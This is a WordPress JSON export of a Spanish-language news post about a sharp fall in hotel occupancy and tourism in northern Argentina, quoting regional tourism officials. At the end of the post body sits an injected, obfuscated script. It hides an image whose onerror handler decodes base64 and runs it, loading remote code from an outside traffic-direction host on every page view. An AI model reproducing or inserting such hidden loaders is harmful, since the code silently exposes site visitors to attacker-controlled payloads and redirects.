{"id":8349,"date":"2024-06-24T11:53:57","date_gmt":"2024-06-24T14:53:57","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8349"},"modified":"2025-08-13T15:42:29","modified_gmt":"2025-08-13T18:42:29","slug":"segun-el-portal-de-noticias-riohondonews-com-ano-dificil-para-la-actividad-turistica","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8349","title":{"rendered":"Seg\u00fan el portal de noticias Riohondonews.com: A\u00f1o dif\u00edcil para la actividad tur\u00edstica."},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a2d03956a473582c1de1a9702048ebc2\" style=\"background-color:#0370af\"><em>La actividad tur\u00edstica en el norte argentino atraviesa uno de los momentos m\u00e1s dif\u00edciles de los \u00faltimos a\u00f1os, con el par\u00e9ntesis de la pandemia de Covid 19, escenario al que un empresario describi\u00f3 como una \u00abmini pandemia\u00bb por la baja ocupaci\u00f3n hotelera y los graves problemas que afectan al sector de la gastronom\u00eda. \u00abRemamos en dulce de leche\u00bb, sostuvo el due\u00f1o de dos hoteles en Las Termas de R\u00edo Hondo. Hay pocas ocupaci\u00f3n en este fin de semana largo.<\/em><\/h4>\n\n\n\n<p>De acuerdo al presidente de la C\u00e1mara de Turismo de Santiago del Estero, Miguel Figueroa, la actividad tur\u00edstica del pasado fin de semana largo no fue la esperada. \u00abDisminuy\u00f3 un 65%, en relaci\u00f3n al a\u00f1o pasado, por lo que atravesamos por una situaci\u00f3n muy compleja, algo as\u00ed como una mini pandemia\u00bb, dijo. Y explic\u00f3 que eso se debe a varias razones, que son la p\u00e9rdida del poder adquisitivo de las familias por la crisis econ\u00f3mica y los costos elevados de las tarifas de los servicios de agua, luz y gas. \u00abAlgunos negocios de gastronom\u00eda no aguantaron y ya cerraron\u00bb, cont\u00f3.<\/p>\n\n\n\n<p>Detall\u00f3 el empresario santiague\u00f1o que lo que se desplom\u00f3 es la demanda para hoteler\u00eda de una a tres estrellas, que es el turismo de jubilados, el familiar, de grupos y social. No as\u00ed la demanda de los sectores ABC 1 y 2 de la sociedad, es decir, para hoteles de cuatro y cinco estrellas, que se sostienen en el orden del 80%. \u00abPara julio hay algo de ilusi\u00f3n pero no ser\u00e1n los n\u00fameros de otros a\u00f1os\u00bb, pronostic\u00f3.<\/p>\n\n\n\n<p>M\u00e1s enf\u00e1tico fue su par Fernando Storino, vicepresidente de la C\u00e1mara Hotelera y Gastron\u00f3mica de Las Termas de R\u00edo Hondo y presidente del Bureau de Las Termas. Esta ciudad se caracteriza porque su temporada alta se desarrolla entre el oto\u00f1o y el invierno. \u00abEstamos remando arriba de dulce de leche, como se dice. Estamos en una situaci\u00f3n complicada\u00bb, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Due\u00f1o de hoteles en Mar del Plata y en Las Termas, describi\u00f3: \u00abLa realidad que estamos viviendo es mala. Ya venimos con una temporada de verano bastante mala. En la Costa Atl\u00e1ntica la actividad baj\u00f3 m\u00e1s del 50% y ahora tenemos ese fiel reflejo en la temporada de invierno en Las Termas, con casi un 60% de baja en la actividad\u00bb. Consultado sobre sus expectativas para julio, indic\u00f3 que esperan una temporada con una baja de 35% a un 40%. \u00abSer\u00e1 muy dif\u00edcil porque al no tener demandas, bajan las tarifas y suben los costos. Entonces, la rentabilidad es casi nula. Estamos en graves problemas de rentabilidad los hoteles y la parte gastron\u00f3mica tambi\u00e9n\u00bb, manifest\u00f3.<\/p>\n\n\n\n<p>Desplome de la actividad<br>Consultado por \u00c1mbito, el secretario de Turismo de Santiago del Estero, Nelson Bravo, confirm\u00f3 este escenario: \u00abEl fin de semana pasado no fue lo que se esperaba pero no se debe a la oferta porque tenemos precios competitivos, sino a la ca\u00edda de la demanda, a la crisis econ\u00f3mica. Cuando a una familia le ingresa menos dinero, el turismo pasa a ser una segunda o tercera prioridad\u00bb, sostuvo.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que frente a ello, desde el gobierno provincial procuran sostener la demanda con la organizaci\u00f3n de eventos como las carreras de automovilismo en el Aut\u00f3dromo Internacional de Las Termas, partidos de f\u00fatbol en el Estadio Madre de Ciudades y otro tipo de eventos. \u00abLogramos, en parte, que se mueva el turismo interno, el de cercan\u00eda, que es importante. Pero son fotos de una pel\u00edcula complicada\u00bb. Remarc\u00f3 que el sector extra\u00f1a el Programa PreViaje de la Naci\u00f3n, que el actual Gobierno cort\u00f3. \u00abTambi\u00e9n el \u201950 Destinos\u2019, que implicaba obras p\u00fablicas y que pese a que Santiago invert\u00eda m\u00e1s que eso, era relevante\u00bb, reflexion\u00f3.<\/p>\n\n\n\n<p>Desde Catamarca, Evangelina Quarin, secretaria de Gesti\u00f3n Tur\u00edstica de la provincia, evalu\u00f3 que la ca\u00edda de la demanda fue similar a la que inform\u00f3 la C\u00e1mara Argentina de la Mediana Empresa (CAME) para todo el pa\u00eds, es decir, del orden del 64%. El pasado fin de semana largo, solo Fiambal\u00e1, en donde se encuentran las termas, El Rodeo y Las Juntas hicieron la diferencia por el turismo interno. \u00abTodo este cuadro tiene que ver con lo que est\u00e1 pasando a nivel pa\u00eds, sobre todo, porque las familias est\u00e1n ahorrando para poder vacacionar en julio y no en estos fines de semana\u00bb, sostuvo.<\/p>\n\n\n\n<p>El salte\u00f1o Juan Lucero, presidente de la C\u00e1mara de Turismo de su provincia, tambi\u00e9n consider\u00f3 que hubo una ca\u00edda y detall\u00f3 que fue de un 50% el promedio de ocupaci\u00f3n hotelera el fin de semana pasado. Esperan, de todos modos, que aumente hasta un 60% durante el actual. El empresario puso el acento en que para Salta la temporada alta es el invierno, sobre todo en julio, pero reconoci\u00f3 que para este a\u00f1o esperan una retracci\u00f3n en comparaci\u00f3n al a\u00f1o pasado, cuando todav\u00eda estaba vigente el PreViaje, que dej\u00f3 cifras hist\u00f3ricas de recaudaci\u00f3n en Salta. \u00abYa sab\u00edamos que junio ser\u00eda un mes dif\u00edcil, de contexto complejo, por eso impulsamos la Semana Gastron\u00f3mica, el Calendario G\u00fcemesiano y el Outlet Salta, porque todo ayuda para que venga el turismo nacional\u00bb, expres\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/riohondonews.com\/ano-dificil-para-la-actividad-turistica\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"498\" height=\"477\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/cropped-FAVICON-04.png\" alt=\"\" class=\"wp-image-8350\" style=\"width:124px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/cropped-FAVICON-04.png 498w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/cropped-FAVICON-04-300x287.png 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/cropped-FAVICON-04-438x420.png 438w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/cropped-FAVICON-04-320x307.png 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/cropped-FAVICON-04-480x460.png 480w\" sizes=\"(max-width: 498px) 100vw, 498px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La actividad tur\u00edstica en el norte argentino atraviesa uno de los momentos m\u00e1s dif\u00edciles de los \u00faltimos a\u00f1os, con el par\u00e9ntesis de la pandemia de Covid 19, escenario al que un empresario describi\u00f3 como una \u00abmini pandemia\u00bb por la baja ocupaci\u00f3n hotelera y los graves problemas que afectan al sector de la gastronom\u00eda. \u00abRemamos en [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8351,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-8349","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noa"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8349","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8349"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8349\/revisions"}],"predecessor-version":[{"id":10143,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8349\/revisions\/10143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8351"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}